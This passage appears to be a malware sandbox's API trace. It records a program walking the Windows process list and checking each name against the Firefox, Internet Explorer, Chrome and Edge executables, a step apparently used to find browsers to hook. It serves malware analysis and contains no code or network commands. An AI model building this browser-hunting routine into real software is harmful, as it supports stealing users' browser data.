1 [0237.841] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0237.842] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0237.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.842] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0237.842] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0237.842] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0237.842] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.843] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0237.843] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0237.843] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0237.843] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.843] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0237.843] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0237.843] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0237.843] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.844] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0237.844] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0237.844] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0237.844] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.844] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0237.844] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0237.844] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0237.844] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.845] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0237.845] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0237.845] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0237.845] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.845] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0237.845] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0237.845] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0237.845] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0237.846] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0237.846] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0237.846] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0237.846] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.848] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.849] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.849] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.849] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.849] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.849] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.849] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0237.849] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0237.850] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0237.850] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.850] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.850] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.850] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.850] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.851] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.851] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.851] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.851] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.851] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0237.851] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0237.851] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0237.851] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.852] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0237.852] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0237.852] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0237.852] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.852] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0237.852] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0237.852] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0237.852] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.853] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.853] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.853] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.853] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.853] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.853] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0237.853] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0237.853] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0237.854] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0237.854] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0237.854] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0237.854] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0237.854] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0237.855] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0237.855] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0237.855] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0237.855] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0237.855] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0237.855] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0237.855] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0237.855] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0237.856] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0237.856] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0237.856] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0237.856] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.856] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0237.856] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0237.856] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0237.856] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0237.856] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.856] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0237.857] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0237.857] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0237.857] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0237.857] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0237.857] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0237.857] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0237.857] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0237.857] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0237.858] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0237.858] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0237.858] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0237.858] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.858] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0237.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0237.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0237.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0237.859] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.859] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0237.859] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0237.859] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0237.859] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0237.859] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.859] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0237.860] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0237.860] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0237.860] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0237.860] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.860] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0237.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0237.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0237.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0237.860] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.860] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0237.861] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0237.861] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0237.861] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0237.861] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0237.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0237.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0237.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0237.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0237.862] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0237.862] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0237.862] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0237.862] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.862] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0237.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0237.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0237.863] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0237.863] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.863] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0237.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0237.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0237.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0237.863] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.863] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0237.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0237.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0237.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0237.864] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.864] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0237.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0237.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0237.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0237.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.864] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 